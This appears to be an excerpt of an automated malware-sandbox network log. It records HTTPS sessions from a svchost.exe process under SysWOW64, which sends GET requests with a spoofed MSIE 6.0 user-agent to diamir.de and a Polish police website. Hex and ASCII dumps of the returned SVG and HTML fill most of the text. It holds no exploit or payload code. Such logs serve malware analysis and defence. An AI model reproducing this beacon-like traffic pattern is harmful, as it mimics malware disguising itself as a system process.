                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2384INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                        Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2400INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                                                                                                        Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2416INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                        Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2432INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2448INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                                                                                                        Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2464INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2480INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                                                                                                        Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2496INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                        Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2512INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2528INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2544INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                                                                                                        Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2560INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                                                                                                        Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2576INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                        Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
                                                                                                                                                                                                                                                        2023-10-09 13:51:01 UTC2592INData Raw: 63 6c 61 73 73 3d 22 73 75 62 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 2d 77 72 61 70 20 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 73 75 62 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 22 3e e5 ae 9f e7 b8 be e7 b4 b9 e4 bb 8b 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 70 65 72 66 6f 72 6d 61 6e 63 65 2d 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 20 69 64 3d 22 74 6f 70 2d 73 6c 69 64 65 22 3e 0a 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: class="subsection-title-wrap top-performance-title"> <h2 class="subsection-title"></h2> </div> <div class="top-performance-wrap"> <div class="container"> <div class="row" id="top-slide">


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        6192.168.2.35007694.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:50:56 UTC28OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC252INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:50:57 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC253INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        7192.168.2.35007091.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC124OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC509INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:51:03 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        2023-10-09 13:50:57 UTC509INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
